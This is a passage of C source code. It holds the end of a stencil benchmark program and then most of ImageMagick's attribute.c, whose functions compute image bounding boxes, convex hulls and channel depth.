min_tdiff = MIN(min_tdiff, tdiff);
printf("Rank 0 TEST# %d time: %f\n", test, tdiff);
}
PRINT_RESULTS(4, "constant")
#ifdef LIKWID_PERFMON
#pragma omp parallel
{
LIKWID_MARKER_STOP("calc");
}
LIKWID_MARKER_CLOSE;
#endif
// Free allocated arrays
for(i=0; i<Nz; i++){
for(j=0;j<Ny;j++){
free(A[0][i][j]);
free(A[1][i][j]);
free(roc2[i][j]);
}
free(A[0][i]);
free(A[1][i]);
free(roc2[i]);
}
free(A[0]);
free(A[1]);
free(roc2);
return 0;
}
|
attribute.c | /*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% AAA TTTTT TTTTT RRRR IIIII BBBB U U TTTTT EEEEE %
% A A T T R R I B B U U T E %
% AAAAA T T RRRR I BBBB U U T EEE %
% A A T T R R I B B U U T E %
% A A T T R R IIIII BBBB UUU T EEEEE %
% %
% %
% MagickCore Get / Set Image Attributes %
% %
% Software Design %
% Cristy %
% October 2002 %
% %
% %
% Copyright 1999-2021 ImageMagick Studio LLC, a non-profit organization %
% dedicated to making software imaging solutions freely available. %
% %
% You may not use this file except in compliance with the License. You may %
% obtain a copy of the License at %
% %
% https://imagemagick.org/script/license.php %
% %
% Unless required by applicable law or agreed to in writing, software %
% distributed under the License is distributed on an "AS IS" BASIS, %
% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. %
% See the License for the specific language governing permissions and %
% limitations under the License. %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
%
%
*/
/*
Include declarations.
*/
#include "MagickCore/studio.h"
#include "MagickCore/artifact.h"
#include "MagickCore/attribute.h"
#include "MagickCore/blob.h"
#include "MagickCore/blob-private.h"
#include "MagickCore/cache.h"
#include "MagickCore/cache-private.h"
#include "MagickCore/cache-view.h"
#include "MagickCore/channel.h"
#include "MagickCore/client.h"
#include "MagickCore/color.h"
#include "MagickCore/color-private.h"
#include "MagickCore/colormap.h"
#include "MagickCore/colormap-private.h"
#include "MagickCore/colorspace.h"
#include "MagickCore/colorspace-private.h"
#include "MagickCore/composite.h"
#include "MagickCore/composite-private.h"
#include "MagickCore/constitute.h"
#include "MagickCore/draw.h"
#include "MagickCore/draw-private.h"
#include "MagickCore/effect.h"
#include "MagickCore/enhance.h"
#include "MagickCore/exception.h"
#include "MagickCore/exception-private.h"
#include "MagickCore/geometry.h"
#include "MagickCore/histogram.h"
#include "MagickCore/identify.h"
#include "MagickCore/image.h"
#include "MagickCore/image-private.h"
#include "MagickCore/list.h"
#include "MagickCore/log.h"
#include "MagickCore/memory_.h"
#include "MagickCore/magick.h"
#include "MagickCore/monitor.h"
#include "MagickCore/monitor-private.h"
#include "MagickCore/option.h"
#include "MagickCore/paint.h"
#include "MagickCore/pixel.h"
#include "MagickCore/pixel-accessor.h"
#include "MagickCore/property.h"
#include "MagickCore/quantize.h"
#include "MagickCore/quantum-private.h"
#include "MagickCore/random_.h"
#include "MagickCore/resource_.h"
#include "MagickCore/semaphore.h"
#include "MagickCore/segment.h"
#include "MagickCore/splay-tree.h"
#include "MagickCore/string_.h"
#include "MagickCore/string-private.h"
#include "MagickCore/thread-private.h"
#include "MagickCore/threshold.h"
#include "MagickCore/transform.h"
#include "MagickCore/utility.h"
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
+ G e t I m a g e B o u n d i n g B o x %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageBoundingBox() returns the bounding box of an image canvas.
%
% The format of the GetImageBoundingBox method is:
%
% RectangleInfo GetImageBoundingBox(const Image *image,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o bounds: Method GetImageBoundingBox returns the bounding box of an
% image canvas.
%
% o image: the image.
%
% o exception: return any errors or warnings in this structure.
%
*/
typedef struct _EdgeInfo
{
double
left,
right,
top,
bottom;
} EdgeInfo;
static double GetEdgeBackgroundCensus(const Image *image,
const CacheView *image_view,const GravityType gravity,const size_t width,
const size_t height,const ssize_t x_offset,const ssize_t y_offset,
ExceptionInfo *exception)
{
CacheView
*edge_view;
const char
*artifact;
double
census;
Image
*edge_image;
PixelInfo
background,
pixel;
RectangleInfo
edge_geometry;
const Quantum
*p;
ssize_t
y;
/*
Determine the percent of image background for this edge.
*/
switch (gravity)
{
case NorthWestGravity:
case NorthGravity:
default:
{
p=GetCacheViewVirtualPixels(image_view,0,0,1,1,exception);
break;
}
case NorthEastGravity:
case EastGravity:
{
p=GetCacheViewVirtualPixels(image_view,(ssize_t) image->columns-1,0,1,1,
exception);
break;
}
case SouthEastGravity:
case SouthGravity:
{
p=GetCacheViewVirtualPixels(image_view,(ssize_t) image->columns-1,
(ssize_t) image->rows-1,1,1,exception);
break;
}
case SouthWestGravity:
case WestGravity:
{
p=GetCacheViewVirtualPixels(image_view,0,(ssize_t) image->rows-1,1,1,
exception);
break;
}
}
GetPixelInfoPixel(image,p,&background);
artifact=GetImageArtifact(image,"background");
if (artifact != (const char *) NULL)
(void) QueryColorCompliance(artifact,AllCompliance,&background,exception);
artifact=GetImageArtifact(image,"trim:background-color");
if (artifact != (const char *) NULL)
(void) QueryColorCompliance(artifact,AllCompliance,&background,exception);
edge_geometry.width=width;
edge_geometry.height=height;
edge_geometry.x=x_offset;
edge_geometry.y=y_offset;
GravityAdjustGeometry(image->columns,image->rows,gravity,&edge_geometry);
edge_image=CropImage(image,&edge_geometry,exception);
if (edge_image == (Image *) NULL)
return(0.0);
census=0.0;
edge_view=AcquireVirtualCacheView(edge_image,exception);
for (y=0; y < (ssize_t) edge_image->rows; y++)
{
ssize_t
x;
p=GetCacheViewVirtualPixels(edge_view,0,y,edge_image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
for (x=0; x < (ssize_t) edge_image->columns; x++)
{
GetPixelInfoPixel(edge_image,p,&pixel);
if (IsFuzzyEquivalencePixelInfo(&pixel,&background) == MagickFalse)
census++;
p+=GetPixelChannels(edge_image);
}
}
census/=((double) edge_image->columns*edge_image->rows);
edge_view=DestroyCacheView(edge_view);
edge_image=DestroyImage(edge_image);
return(census);
}
static inline double GetMinEdgeBackgroundCensus(const EdgeInfo *edge)
{
double
census;
census=MagickMin(MagickMin(MagickMin(edge->left,edge->right),edge->top),
edge->bottom);
return(census);
}
static RectangleInfo GetEdgeBoundingBox(const Image *image,
ExceptionInfo *exception)
{
CacheView
*edge_view;
const char
*artifact;
double
background_census,
percent_background;
EdgeInfo
edge,
vertex;
Image
*edge_image;
RectangleInfo
bounds;
/*
Get the image bounding box.
*/
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
SetGeometry(image,&bounds);
edge_image=CloneImage(image,0,0,MagickTrue,exception);
if (edge_image == (Image *) NULL)
return(bounds);
(void) ParseAbsoluteGeometry("0x0+0+0",&edge_image->page);
(void) memset(&vertex,0,sizeof(vertex));
edge_view=AcquireVirtualCacheView(edge_image,exception);
edge.left=GetEdgeBackgroundCensus(edge_image,edge_view,WestGravity,
1,0,0,0,exception);
edge.right=GetEdgeBackgroundCensus(edge_image,edge_view,EastGravity,
1,0,0,0,exception);
edge.top=GetEdgeBackgroundCensus(edge_image,edge_view,NorthGravity,
0,1,0,0,exception);
edge.bottom=GetEdgeBackgroundCensus(edge_image,edge_view,SouthGravity,
0,1,0,0,exception);
percent_background=1.0;
artifact=GetImageArtifact(edge_image,"trim:percent-background");
if (artifact != (const char *) NULL)
percent_background=StringToDouble(artifact,(char **) NULL)/100.0;
percent_background=MagickMin(MagickMax(1.0-percent_background,MagickEpsilon),
1.0);
background_census=GetMinEdgeBackgroundCensus(&edge);
for ( ; background_census < percent_background;
background_census=GetMinEdgeBackgroundCensus(&edge))
{
if ((bounds.width == 0) || (bounds.height == 0))
break;
if (fabs(edge.left-background_census) < MagickEpsilon)
{
/*
Trim left edge.
*/
vertex.left++;
bounds.width--;
edge.left=GetEdgeBackgroundCensus(edge_image,edge_view,
NorthWestGravity,1,bounds.height,(ssize_t) vertex.left,(ssize_t)
vertex.top,exception);
edge.top=GetEdgeBackgroundCensus(edge_image,edge_view,
NorthWestGravity,bounds.width,1,(ssize_t) vertex.left,(ssize_t)
vertex.top,exception);
edge.bottom=GetEdgeBackgroundCensus(edge_image,edge_view,
SouthWestGravity,bounds.width,1,(ssize_t) vertex.left,(ssize_t)
vertex.bottom,exception);
continue;
}
if (fabs(edge.right-background_census) < MagickEpsilon)
{
/*
Trim right edge.
*/
vertex.right++;
bounds.width--;
edge.right=GetEdgeBackgroundCensus(edge_image,edge_view,
NorthEastGravity,1,bounds.height,(ssize_t) vertex.right,(ssize_t)
vertex.top,exception);
edge.top=GetEdgeBackgroundCensus(edge_image,edge_view,
NorthWestGravity,bounds.width,1,(ssize_t) vertex.left,(ssize_t)
vertex.top,exception);
edge.bottom=GetEdgeBackgroundCensus(edge_image,edge_view,
SouthWestGravity,bounds.width,1,(ssize_t) vertex.left,(ssize_t)
vertex.bottom,exception);
continue;
}
if (fabs(edge.top-background_census) < MagickEpsilon)
{
/*
Trim top edge.
*/
vertex.top++;
bounds.height--;
edge.left=GetEdgeBackgroundCensus(edge_image,edge_view,
NorthWestGravity,1,bounds.height,(ssize_t) vertex.left,(ssize_t)
vertex.top,exception);
edge.right=GetEdgeBackgroundCensus(edge_image,edge_view,
NorthEastGravity,1,bounds.height,(ssize_t) vertex.right,(ssize_t)
vertex.top,exception);
edge.top=GetEdgeBackgroundCensus(edge_image,edge_view,
NorthWestGravity,bounds.width,1,(ssize_t) vertex.left,(ssize_t)
vertex.top,exception);
continue;
}
if (fabs(edge.bottom-background_census) < MagickEpsilon)
{
/*
Trim bottom edge.
*/
vertex.bottom++;
bounds.height--;
edge.left=GetEdgeBackgroundCensus(edge_image,edge_view,
NorthWestGravity,1,bounds.height,(ssize_t) vertex.left,(ssize_t)
vertex.top,exception);
edge.right=GetEdgeBackgroundCensus(edge_image,edge_view,
NorthEastGravity,1,bounds.height,(ssize_t) vertex.right,(ssize_t)
vertex.top,exception);
edge.bottom=GetEdgeBackgroundCensus(edge_image,edge_view,
SouthWestGravity,bounds.width,1,(ssize_t) vertex.left,(ssize_t)
vertex.bottom,exception);
continue;
}
}
edge_view=DestroyCacheView(edge_view);
edge_image=DestroyImage(edge_image);
bounds.x=(ssize_t) vertex.left;
bounds.y=(ssize_t) vertex.top;
if ((bounds.width == 0) || (bounds.height == 0))
(void) ThrowMagickException(exception,GetMagickModule(),OptionWarning,
"GeometryDoesNotContainImage","`%s'",image->filename);
return(bounds);
}
MagickExport RectangleInfo GetImageBoundingBox(const Image *image,
ExceptionInfo *exception)
{
CacheView
*image_view;
const char
*artifact;
MagickBooleanType
status;
PixelInfo
target[4],
zero;
RectangleInfo
bounds;
const Quantum
*p;
ssize_t
y;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
artifact=GetImageArtifact(image,"trim:percent-background");
if (artifact != (const char *) NULL)
return(GetEdgeBoundingBox(image,exception));
artifact=GetImageArtifact(image, "trim:edges");
if (artifact == (const char *) NULL)
{
bounds.width=image->columns == 1 ? 1 : 0;
bounds.height=image->rows == 1 ? 1 : 0;
bounds.x=(ssize_t) image->columns;
bounds.y=(ssize_t) image->rows;
}
else
{
char
*edges,
*q,
*r;
bounds.width=(size_t) image->columns;
bounds.height=(size_t) image->rows;
bounds.x=0;
bounds.y=0;
edges=AcquireString(artifact);
r=edges;
while ((q=StringToken(",",&r)) != (char *) NULL)
{
if (LocaleCompare(q,"north") == 0)
bounds.y=(ssize_t) image->rows;
if (LocaleCompare(q,"east") == 0)
bounds.width=0;
if (LocaleCompare(q,"south") == 0)
bounds.height=0;
if (LocaleCompare(q,"west") == 0)
bounds.x=(ssize_t) image->columns;
}
edges=DestroyString(edges);
}
GetPixelInfo(image,&target[0]);
image_view=AcquireVirtualCacheView(image,exception);
p=GetCacheViewVirtualPixels(image_view,0,0,1,1,exception);
if (p == (const Quantum *) NULL)
{
image_view=DestroyCacheView(image_view);
return(bounds);
}
GetPixelInfoPixel(image,p,&target[0]);
GetPixelInfo(image,&target[1]);
p=GetCacheViewVirtualPixels(image_view,(ssize_t) image->columns-1,0,1,1,
exception);
if (p != (const Quantum *) NULL)
GetPixelInfoPixel(image,p,&target[1]);
GetPixelInfo(image,&target[2]);
p=GetCacheViewVirtualPixels(image_view,0,(ssize_t) image->rows-1,1,1,
exception);
if (p != (const Quantum *) NULL)
GetPixelInfoPixel(image,p,&target[2]);
p=GetCacheViewVirtualPixels(image_view,(ssize_t) image->columns-1,(ssize_t)
image->rows-1,1,1,exception);
if (p != (const Quantum *) NULL)
GetPixelInfoPixel(image,p,&target[3]);
status=MagickTrue;
GetPixelInfo(image,&zero);
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(status) \
magick_number_threads(image,image,image->rows,1)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
PixelInfo
pixel;
RectangleInfo
bounding_box;
const Quantum
*magick_restrict q;
ssize_t
x;
if (status == MagickFalse)
continue;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
# pragma omp critical (MagickCore_GetImageBoundingBox)
#endif
bounding_box=bounds;
q=GetCacheViewVirtualPixels(image_view,0,y,image->columns,1,exception);
if (q == (const Quantum *) NULL)
{
status=MagickFalse;
continue;
}
pixel=zero;
for (x=0; x < (ssize_t) image->columns; x++)
{
GetPixelInfoPixel(image,q,&pixel);
if ((x < bounding_box.x) &&
(IsFuzzyEquivalencePixelInfo(&pixel,&target[0]) == MagickFalse))
bounding_box.x=x;
if ((x > (ssize_t) bounding_box.width) &&
(IsFuzzyEquivalencePixelInfo(&pixel,&target[1]) == MagickFalse))
bounding_box.width=(size_t) x;
if ((y < bounding_box.y) &&
(IsFuzzyEquivalencePixelInfo(&pixel,&target[0]) == MagickFalse))
bounding_box.y=y;
if ((y > (ssize_t) bounding_box.height) &&
(IsFuzzyEquivalencePixelInfo(&pixel,&target[2]) == MagickFalse))
bounding_box.height=(size_t) y;
if ((x < (ssize_t) bounding_box.width) &&
(y > (ssize_t) bounding_box.height) &&
(IsFuzzyEquivalencePixelInfo(&pixel,&target[3]) == MagickFalse))
{
bounding_box.width=(size_t) x;
bounding_box.height=(size_t) y;
}
q+=GetPixelChannels(image);
}
#if defined(MAGICKCORE_OPENMP_SUPPORT)
# pragma omp critical (MagickCore_GetImageBoundingBox)
#endif
{
if (bounding_box.x < bounds.x)
bounds.x=bounding_box.x;
if (bounding_box.y < bounds.y)
bounds.y=bounding_box.y;
if (bounding_box.width > bounds.width)
bounds.width=bounding_box.width;
if (bounding_box.height > bounds.height)
bounds.height=bounding_box.height;
}
}
image_view=DestroyCacheView(image_view);
if ((bounds.width == 0) || (bounds.height == 0))
(void) ThrowMagickException(exception,GetMagickModule(),OptionWarning,
"GeometryDoesNotContainImage","`%s'",image->filename);
else
{
bounds.width-=(bounds.x-1);
bounds.height-=(bounds.y-1);
}
return(bounds);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e C o n v e x H u l l %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageConvexHull() returns the convex hull points of an image canvas.
%
% The format of the GetImageConvexHull method is:
%
% PointInfo *GetImageConvexHull(const Image *image,
% size_t number_vertices,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o number_vertices: the number of vertices in the convex hull.
%
% o exception: return any errors or warnings in this structure.
%
*/
static double LexicographicalOrder(PointInfo *a,PointInfo *b,PointInfo *c)
{
/*
Order by x-coordinate, and in case of a tie, by y-coordinate.
*/
return((b->x-a->x)*(c->y-a->y)-(b->y-a->y)*(c->x-a->x));
}
static PixelInfo GetEdgeBackgroundColor(const Image *image,
const CacheView *image_view,ExceptionInfo *exception)
{
const char
*artifact;
double
census[4],
edge_census;
PixelInfo
background[4],
edge_background;
ssize_t
i;
/*
Most dominant color of edges/corners is the background color of the image.
*/
memset(&edge_background,0,sizeof(edge_background));
artifact=GetImageArtifact(image,"convex-hull:background-color");
if (artifact == (const char *) NULL)
artifact=GetImageArtifact(image,"background");
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static)
#endif
for (i=0; i < 4; i++)
{
CacheView
*edge_view;
GravityType
gravity;
Image
*edge_image;
PixelInfo
pixel;
RectangleInfo
edge_geometry;
const Quantum
*p;
ssize_t
y;
census[i]=0.0;
(void) memset(&edge_geometry,0,sizeof(edge_geometry));
switch (i)
{
case 0:
default:
{
p=GetCacheViewVirtualPixels(image_view,0,(ssize_t) image->rows-1,1,1,
exception);
gravity=WestGravity;
edge_geometry.width=1;
edge_geometry.height=0;
break;
}
case 1:
{
p=GetCacheViewVirtualPixels(image_view,(ssize_t) image->columns-1,0,1,1,
exception);
gravity=EastGravity;
edge_geometry.width=1;
edge_geometry.height=0;
break;
}
case 2:
{
p=GetCacheViewVirtualPixels(image_view,0,0,1,1,exception);
gravity=NorthGravity;
edge_geometry.width=0;
edge_geometry.height=1;
break;
}
case 3:
{
p=GetCacheViewVirtualPixels(image_view,(ssize_t) image->columns-1,
(ssize_t) image->rows-1,1,1,exception);
gravity=SouthGravity;
edge_geometry.width=0;
edge_geometry.height=1;
break;
}
}
GetPixelInfoPixel(image,p,background+i);
if (artifact != (const char *) NULL)
(void) QueryColorCompliance(artifact,AllCompliance,background+i,
exception);
GravityAdjustGeometry(image->columns,image->rows,gravity,&edge_geometry);
edge_image=CropImage(image,&edge_geometry,exception);
if (edge_image == (Image *) NULL)
continue;
edge_view=AcquireVirtualCacheView(edge_image,exception);
for (y=0; y < (ssize_t) edge_image->rows; y++)
{
ssize_t
x;
p=GetCacheViewVirtualPixels(edge_view,0,y,edge_image->columns,1,
exception);
if (p == (const Quantum *) NULL)
break;
for (x=0; x < (ssize_t) edge_image->columns; x++)
{
GetPixelInfoPixel(edge_image,p,&pixel);
if (IsFuzzyEquivalencePixelInfo(&pixel,background+i) == MagickFalse)
census[i]++;
p+=GetPixelChannels(edge_image);
}
}
edge_view=DestroyCacheView(edge_view);
edge_image=DestroyImage(edge_image);
}
edge_census=(-1.0);
for (i=0; i < 4; i++)
if (census[i] > edge_census)
{
edge_background=background[i];
edge_census=census[i];
}
return(edge_background);
}
void TraceConvexHull(PointInfo *vertices,size_t number_vertices,
PointInfo ***monotone_chain,size_t *chain_length)
{
PointInfo
**chain;
ssize_t
i;
size_t
demark,
n;
/*
Construct the upper and lower hulls: rightmost to leftmost counterclockwise.
*/
chain=(*monotone_chain);
n=0;
for (i=0; i < (ssize_t) number_vertices; i++)
{
while ((n >= 2) &&
(LexicographicalOrder(chain[n-2],chain[n-1],&vertices[i]) <= 0.0))
n--;
chain[n++]=(&vertices[i]);
}
demark=n+1;
for (i=(ssize_t) number_vertices-2; i >= 0; i--)
{
while ((n >= demark) &&
(LexicographicalOrder(chain[n-2],chain[n-1],&vertices[i]) <= 0.0))
n--;
chain[n++]=(&vertices[i]);
}
*chain_length=n;
}
MagickExport PointInfo *GetImageConvexHull(const Image *image,
size_t *number_vertices,ExceptionInfo *exception)
{
CacheView
*image_view;
MagickBooleanType
status;
MemoryInfo
*monotone_info,
*vertices_info;
PixelInfo
background;
PointInfo
*convex_hull,
**monotone_chain,
*vertices;
size_t
n;
ssize_t
y;
/*
Identify convex hull vertices of image foreground object(s).
*/
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
*number_vertices=0;
vertices_info=AcquireVirtualMemory(image->columns,image->rows*
sizeof(*vertices));
monotone_info=AcquireVirtualMemory(2*image->columns,2*
image->rows*sizeof(*monotone_chain));
if ((vertices_info == (MemoryInfo *) NULL) ||
(monotone_info == (MemoryInfo *) NULL))
{
if (monotone_info != (MemoryInfo *) NULL)
monotone_info=(MemoryInfo *) RelinquishVirtualMemory(monotone_info);
if (vertices_info != (MemoryInfo *) NULL)
vertices_info=RelinquishVirtualMemory(vertices_info);
return((PointInfo *) NULL);
}
vertices=(PointInfo *) GetVirtualMemoryBlob(vertices_info);
monotone_chain=(PointInfo **) GetVirtualMemoryBlob(monotone_info);
image_view=AcquireVirtualCacheView(image,exception);
background=GetEdgeBackgroundColor(image,image_view,exception);
status=MagickTrue;
n=0;
for (y=0; y < (ssize_t) image->rows; y++)
{
const Quantum
*p;
ssize_t
x;
if (status == MagickFalse)
continue;
p=GetCacheViewVirtualPixels(image_view,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
{
status=MagickFalse;
continue;
}
for (x=0; x < (ssize_t) image->columns; x++)
{
PixelInfo
pixel;
GetPixelInfoPixel(image,p,&pixel);
if (IsFuzzyEquivalencePixelInfo(&pixel,&background) == MagickFalse)
{
vertices[n].x=(double) x;
vertices[n].y=(double) y;
n++;
}
p+=GetPixelChannels(image);
}
}
image_view=DestroyCacheView(image_view);
/*
Return the convex hull of the image foreground object(s).
*/
TraceConvexHull(vertices,n,&monotone_chain,number_vertices);
convex_hull=(PointInfo *) AcquireQuantumMemory(*number_vertices,
sizeof(*convex_hull));
if (convex_hull != (PointInfo *) NULL)
for (n=0; n < *number_vertices; n++)
convex_hull[n]=(*monotone_chain[n]);
monotone_info=RelinquishVirtualMemory(monotone_info);
vertices_info=RelinquishVirtualMemory(vertices_info);
return(convex_hull);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e D e p t h %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageDepth() returns the depth of a particular image channel.
%
% The format of the GetImageDepth method is:
%
% size_t GetImageDepth(const Image *image,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport size_t GetImageDepth(const Image *image,ExceptionInfo *exception)
{
CacheView
*image_view;
MagickBooleanType
status;
ssize_t
i;
size_t
*current_depth,
depth,
number_threads;
ssize_t
y;
/*
Compute image depth.
*/
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
number_threads=(size_t) GetMagickResourceLimit(ThreadResource);
current_depth=(size_t *) AcquireQuantumMemory(number_threads,
sizeof(*current_depth));
if (current_depth == (size_t *) NULL)
ThrowFatalException(ResourceLimitFatalError,"MemoryAllocationFailed");
status=MagickTrue;
for (i=0; i < (ssize_t) number_threads; i++)
current_depth[i]=1;
if ((image->storage_class == PseudoClass) &&
(image->alpha_trait == UndefinedPixelTrait))
{
for (i=0; i < (ssize_t) image->colors; i++)
{
const int
id = GetOpenMPThreadId();
while (current_depth[id] < MAGICKCORE_QUANTUM_DEPTH)
{
MagickBooleanType
atDepth;
QuantumAny
range;
atDepth=MagickTrue;
range=GetQuantumRange(current_depth[id]);
if ((GetPixelRedTraits(image) & UpdatePixelTrait) != 0)
if (IsPixelAtDepth(ClampToQuantum(image->colormap[i].red),range) == MagickFalse)
atDepth=MagickFalse;
if ((atDepth != MagickFalse) &&
(GetPixelGreenTraits(image) & UpdatePixelTrait) != 0)
if (IsPixelAtDepth(ClampToQuantum(image->colormap[i].green),range) == MagickFalse)
atDepth=MagickFalse;
if ((atDepth != MagickFalse) &&
(GetPixelBlueTraits(image) & UpdatePixelTrait) != 0)
if (IsPixelAtDepth(ClampToQuantum(image->colormap[i].blue),range) == MagickFalse)
atDepth=MagickFalse;
if ((atDepth != MagickFalse))
break;
current_depth[id]++;
}
}
depth=current_depth[0];
for (i=1; i < (ssize_t) number_threads; i++)
if (depth < current_depth[i])
depth=current_depth[i];
current_depth=(size_t *) RelinquishMagickMemory(current_depth);
return(depth);
}
image_view=AcquireVirtualCacheView(image,exception);
#if !defined(MAGICKCORE_HDRI_SUPPORT)
DisableMSCWarning(4127)
if ((1UL*QuantumRange) <= MaxMap)
RestoreMSCWarning
{
size_t
*depth_map;
/*
Scale pixels to desired (optimized with depth map).
*/
depth_map=(size_t *) AcquireQuantumMemory(MaxMap+1,sizeof(*depth_map));
if (depth_map == (size_t *) NULL)
ThrowFatalException(ResourceLimitFatalError,"MemoryAllocationFailed");
for (i=0; i <= (ssize_t) MaxMap; i++)
{
for (depth=1; depth < (size_t) MAGICKCORE_QUANTUM_DEPTH; depth++)
{
Quantum
pixel;
QuantumAny
range;
range=GetQuantumRange(depth);
pixel=(Quantum) i;
if (pixel == ScaleAnyToQuantum(ScaleQuantumToAny(pixel,range),range))
break;
}
depth_map[i]=depth;
}
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(status) \
magick_number_threads(image,image,image->rows,1)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
const int
id = GetOpenMPThreadId();
const Quantum
*magick_restrict p;
ssize_t
x;
if (status == MagickFalse)
continue;
p=GetCacheViewVirtualPixels(image_view,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
continue;
for (x=0; x < (ssize_t) image->columns; x++)
{
ssize_t
j;
for (j=0; j < (ssize_t) GetPixelChannels(image); j++)
{
PixelChannel channel = GetPixelChannelChannel(image,j);
PixelTrait traits = GetPixelChannelTraits(image,channel);
if ((traits & UpdatePixelTrait) == 0)
continue;
if (depth_map[ScaleQuantumToMap(p[j])] > current_depth[id])
current_depth[id]=depth_map[ScaleQuantumToMap(p[j])];
}
p+=GetPixelChannels(image);
}
if (current_depth[id] == MAGICKCORE_QUANTUM_DEPTH)
status=MagickFalse;
}
image_view=DestroyCacheView(image_view);
depth=current_depth[0];
for (i=1; i < (ssize_t) number_threads; i++)
if (depth < current_depth[i])
depth=current_depth[i];
depth_map=(size_t *) RelinquishMagickMemory(depth_map);
current_depth=(size_t *) RelinquishMagickMemory(current_depth);
return(depth);
}
#endif
/*
Compute pixel depth.
*/
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(status) \
magick_number_threads(image,image,image->rows,1)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
const int
id = GetOpenMPThreadId();
const Quantum
*magick_restrict p;
ssize_t
x;
if (status == MagickFalse)
continue;
p=GetCacheViewVirtualPixels(image_view,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
continue;
for (x=0; x < (ssize_t) image->columns; x++)
{
ssize_t
j;
for (j=0; j < (ssize_t) GetPixelChannels(image); j++)
{
PixelChannel
channel;
PixelTrait
traits;
channel=GetPixelChannelChannel(image,j);
traits=GetPixelChannelTraits(image,channel);
if ((traits & UpdatePixelTrait) == 0)
continue;
while (current_depth[id] < MAGICKCORE_QUANTUM_DEPTH)
{
QuantumAny
range;
range=GetQuantumRange(current_depth[id]);
if (p[j] == ScaleAnyToQuantum(ScaleQuantumToAny(p[j],range),range))
break;
current_depth[id]++;
}
}
p+=GetPixelChannels(image);
}
if (current_depth[id] == MAGICKCORE_QUANTUM_DEPTH)
status=MagickFalse;
}
image_view=DestroyCacheView(image_view);
depth=current_depth[0];
for (i=1; i < (ssize_t) number_threads; i++)
if (depth < current_depth[i])
depth=current_depth[i];
current_depth=(size_t *) RelinquishMagickMemory(current_depth);
return(depth);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e M i n i m u m B o u n d i n g B o x %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageMinimumBoundingBox() returns the points that form the minimum
% bounding box around the image foreground objects with the "Rotating
% Calipers" algorithm. The method also returns these properties:
% minimum-bounding-box:area, minimum-bounding-box:width,
% minimum-bounding-box:height, and minimum-bounding-box:angle.
%
% The format of the GetImageMinimumBoundingBox method is:
%
% PointInfo *GetImageMinimumBoundingBox(Image *image,
% size_t number_vertices,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o number_vertices: the number of vertices in the bounding box.
%
% o exception: return any errors or warnings in this structure.
%
*/
typedef struct _CaliperInfo
{
double
area,
width,
height,
projection;
ssize_t
p,
q,
v;
} CaliperInfo;
static inline double getAngle(PointInfo *p,PointInfo *q)
{
/*
Get the angle between line (p,q) and horizontal axis, in degrees.
*/
return(RadiansToDegrees(atan2(q->y-p->y,q->x-p->x)));
}
static inline double getDistance(PointInfo *p,PointInfo *q)
{
double
distance;
distance=hypot(p->x-q->x,p->y-q->y);
return(distance*distance);
}
